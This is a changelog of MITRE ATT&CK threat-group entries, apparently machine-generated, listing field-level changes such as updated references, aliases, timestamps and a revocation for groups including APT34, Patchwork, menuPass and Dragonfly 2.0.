external_references[10]['url']https://pan-unit42.github.io/playbook_viewer/https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/
external_references[11]['source_name']FireEye APT34 Dec 2017Crowdstrike Helix Kitten Nov 2018
external_references[11]['description']Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.
external_references[11]['url']https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.htmlhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
external_references[12]['source_name']Unit 42 QUADAGENT July 2018FireEye APT34 Dec 2017
external_references[12]['description']Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
external_references[12]['url']https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
external_references[14]['source_name']Crowdstrike Helix Kitten Nov 2018APT34
external_references[14]['description']Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)
external_references[15]['source_name']Check Point APT34 April 2021Unit 42 Playbook Dec 2017
external_references[15]['description']Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
external_references[15]['url']https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/https://pan-unit42.github.io/playbook_viewer/
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDragos Threat Intelligence

[G0040] Patchwork

Current version: 1.4


Old Description
New Description
t1[Patchwork](https://attack.mitre.org/groups/G0040) is a cybet1[Patchwork](https://attack.mitre.org/groups/G0040) is a cybe
>respionage group that was first observed in December 2015. W>r espionage group that was first observed in December 2015. 
>hile the group has not been definitively attributed, circums>While the group has not been definitively attributed, circum
>tantial evidence suggests the group may be a pro-Indian or I>stantial evidence suggests the group may be a pro-Indian or 
>ndian entity. [Patchwork](https://attack.mitre.org/groups/G0>Indian entity. [Patchwork](https://attack.mitre.org/groups/G
>040) has been seen targeting industries related to diplomati>0040) has been seen targeting industries related to diplomat
>c and government agencies. Much of the code used by this gro>ic and government agencies. Much of the code used by this gr
>up was copied and pasted from online forums. [Patchwork](htt>oup was copied and pasted from online forums. [Patchwork](ht
>ps://attack.mitre.org/groups/G0040) was also seen operating >tps://attack.mitre.org/groups/G0040) was also seen operating
>spearphishing campaigns targeting U.S. think tank groups in > spearphishing campaigns targeting U.S. think tank groups in
>March and April of 2018. (Citation: Cymmetria Patchwork) (Ci> March and April of 2018.(Citation: Cymmetria Patchwork) (Ci
>tation: Symantec Patchwork) (Citation: TrendMicro Patchwork >tation: Symantec Patchwork)(Citation: TrendMicro Patchwork D
>Dec 2017) (Citation: Volexity Patchwork June 2018)>ec 2017)(Citation: Volexity Patchwork June 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf
external_referenceshttp://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf
external_referenceshttps://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf
values_changed
STIX FieldOld valueNew Value
modified2021-11-02 21:07:07.755000+00:002022-09-02 18:04:32.246000+00:00
description[Patchwork](https://attack.mitre.org/groups/G0040) is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Volexity Patchwork June 2018)[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)
external_references[2]['source_name']Hangover GroupChinastrats
external_references[2]['description']Patchwork and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)(Citation: Securelist Dropping Elephant)
external_references[4]['source_name']ChinastratsHangover Group
external_references[4]['description'](Citation: Securelist Dropping Elephant)[Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)
external_references[5]['source_name']MONSOONCymmetria Patchwork
external_references[5]['description']MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018)Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.
external_references[6]['source_name']Operation HangoverOperation Hangover May 2013
external_references[6]['description']It is believed that the actors behind Patchwork are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.
external_references[7]['source_name']Cymmetria PatchworkSymantec Patchwork
external_references[7]['description']Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.
external_references[7]['url']https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdfhttp://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries
external_references[8]['source_name']Symantec PatchworkUnit 42 BackConfig May 2020
external_references[8]['description']Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
external_references[8]['url']http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industrieshttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
external_references[9]['source_name']TrendMicro Patchwork Dec 2017Operation Hangover
external_references[9]['description']Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)
external_references[10]['source_name']Volexity Patchwork June 2018Securelist Dropping Elephant
external_references[10]['description']Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.
external_references[10]['url']https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/https://securelist.com/the-dropping-elephant-actor/75328/
external_references[11]['source_name']Securelist Dropping ElephantPaloAlto Patchwork Mar 2018
external_references[11]['description']Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
external_references[11]['url']https://securelist.com/the-dropping-elephant-actor/75328/https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/
external_references[12]['source_name']PaloAlto Patchwork Mar 2018TrendMicro Patchwork Dec 2017
external_references[12]['description']Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
external_references[12]['url']https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf
external_references[13]['source_name']Unit 42 BackConfig May 2020Volexity Patchwork June 2018
external_references[13]['description']Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
external_references[13]['url']https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/
external_references[14]['source_name']Forcepoint MonsoonMONSOON
external_references[14]['description']Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018)
external_references[15]['source_name']Operation Hangover May 2013Forcepoint Monsoon
external_references[15]['description']Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
external_references[15]['url']http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdfhttps://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

[G0091] Silence

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-05-26 19:54:55.580000+00:002022-06-02 20:13:56.605000+00:00
aliases[1]WHISPER SPIDERWhisper Spider
external_references[1]['source_name']SilenceWhisper Spider
external_references[1]['description'](Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) (Citation: Crowdstrike GTR2020 Mar 2020)
external_references[2]['source_name']WHISPER SPIDERSilence
external_references[2]['description'](Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)
external_references[3]['source_name']Cyber Forensicator Silence Jan 2019Crowdstrike GTR2020 Mar 2020
external_references[3]['description']Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
external_references[3]['url']https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
external_references[5]['source_name']Crowdstrike GTR2020 Mar 2020Cyber Forensicator Silence Jan 2019
external_references[5]['description']Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.
external_references[5]['url']https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdfhttps://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/

[G0039] Suckfly

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 19:21:39.854000+00:002022-04-15 16:27:38.682000+00:00
external_references[2]['description']DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.
external_references[3]['description']DiMaggio, J.. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.

[G0088] TEMP.Veles

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://dragos.com/resource/xenotime/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:49:09.631000+00:002022-05-24 16:22:20.856000+00:00
external_references[2]['source_name']XENOTIMEDragos Xenotime 2018
external_references[2]['description']The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.
external_references[3]['source_name']FireEye TRITON 2019FireEye TEMP.Veles 2018
external_references[3]['description']Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.htmlhttps://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
external_references[4]['source_name']FireEye TEMP.Veles 2018FireEye TEMP.Veles 2018
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
external_references[5]['source_name']FireEye TEMP.Veles JSON April 2019FireEye TRITON 2019
external_references[5]['description']Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
external_references[5]['url']https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.htmlhttps://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html
external_references[6]['source_name']Dragos Xenotime 2018FireEye TEMP.Veles JSON April 2019
external_references[6]['description']Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.
external_references[6]['url']https://dragos.com/resource/xenotime/https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html
external_references[8]['source_name']FireEye TEMP.Veles 2018 XENOTIME
external_references[8]['description']FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )

[G0045] menuPass

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-11 14:01:44.538000+00:002022-07-20 20:07:40.169000+00:00
external_references[1]['source_name']menuPassHOGFISH
external_references[1]['description'](Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Accenture Hogfish April 2018)
external_references[2]['source_name']CicadaPOTASSIUM
external_references[2]['description'](Citation: Symantec Cicada November 2020)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)
external_references[3]['source_name']POTASSIUMStone Panda
external_references[3]['description'](Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020)
external_references[4]['source_name']Stone PandaAPT10
external_references[4]['description'](Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020)(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)
external_references[5]['source_name']APT10menuPass
external_references[5]['description'](Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)(Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)
external_references[8]['source_name']HOGFISHCicada
external_references[8]['description'](Citation: Accenture Hogfish April 2018)(Citation: Symantec Cicada November 2020)
external_references[9]['source_name']DOJ APT10 Dec 2018Accenture Hogfish April 2018
external_references[9]['description']United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.
external_references[9]['url']https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusionhttps://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf
external_references[10]['source_name']District Court of NY APT10 Indictment December 2018Crowdstrike CrowdCast Oct 2013
external_references[10]['description']US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017.
external_references[10]['url']https://www.justice.gov/opa/page/file/1122671/downloadhttps://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem
external_references[11]['source_name']Palo Alto menuPass Feb 2017FireEye APT10 April 2017
external_references[11]['description']Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
external_references[11]['url']http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html
external_references[12]['source_name']Crowdstrike CrowdCast Oct 2013FireEye Poison Ivy
external_references[12]['description']Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017.FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.
external_references[12]['url']https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problemhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
external_references[13]['source_name']FireEye Poison IvyFireEye APT10 Sept 2018
external_references[13]['description']FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
external_references[13]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdfhttps://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html
external_references[14]['source_name']PWC Cloud Hopper April 2017Palo Alto menuPass Feb 2017
external_references[14]['description']PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
external_references[14]['url']https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdfhttp://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/
external_references[15]['source_name']FireEye APT10 April 2017PWC Cloud Hopper April 2017
external_references[15]['description']FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
external_references[15]['url']https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.htmlhttps://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
external_references[17]['source_name']Accenture Hogfish April 2018DOJ APT10 Dec 2018
external_references[17]['description']Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.
external_references[17]['url']https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdfhttps://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion
external_references[18]['source_name']FireEye APT10 Sept 2018District Court of NY APT10 Indictment December 2018
external_references[18]['description']Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.
external_references[18]['url']https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.htmlhttps://www.justice.gov/opa/page/file/1122671/download
Revocations

[G0074] Dragonfly 2.0

Current version: 2.1

Description: [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )

This object has been revoked by [G0035] Dragonfly

Description for [G0035] Dragonfly: [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 20:07:00.932000+00:002022-05-11 14:00:00.188000+00:00
revokedFalseTrue
external_references[1]['source_name']Dragonfly 2.0DYMALLOY
external_references[1]['description'](Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )
external_references[2]['source_name']IRON LIBERTYBerserk Bear
external_references[2]['description'](Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)(Citation: Fortune Dragonfly 2.0 Sept 2017)
external_references[3]['source_name']DYMALLOYIRON LIBERTY
external_references[3]['description'](Citation: Dragos DYMALLOY )(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)
external_references[4]['source_name']Berserk BearDragonfly 2.0
external_references[4]['description'](Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)
external_references[5]['source_name']US-CERT TA18-074ADragos DYMALLOY
external_references[5]['description']US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.
external_references[5]['url']https://www.us-cert.gov/ncas/alerts/TA18-074Ahttps://www.dragos.com/threat/dymalloy/
external_references[6]['source_name']Symantec Dragonfly Sept 2017Fortune Dragonfly 2.0 Sept 2017
external_references[6]['description']Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.
external_references[6]['url']https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-grouphttp://fortune.com/2017/09/06/hack-energy-grid-symantec/
external_references[7]['source_name']Fortune Dragonfly 2.0 Sept 2017Secureworks MCMD July 2019
external_references[7]['description']Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
external_references[7]['url']http://fortune.com/2017/09/06/hack-energy-grid-symantec/https://www.secureworks.com/research/mcmd-malware-analysis
external_references[8]['source_name']Dragos DYMALLOY Secureworks IRON LIBERTY
external_references[8]['description']Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020.
external_references[8]['url']https://www.dragos.com/threat/dymalloy/https://www.secureworks.com/research/threat-profiles/iron-liberty
external_references[9]['source_name']Secureworks MCMD July 2019Symantec Dragonfly Sept 2017
external_references[9]['description']Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.
external_references[9]['url']https://www.secureworks.com/research/mcmd-malware-analysishttps://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
external_references[10]['source_name']Secureworks IRON LIBERTYUS-CERT TA18-074A
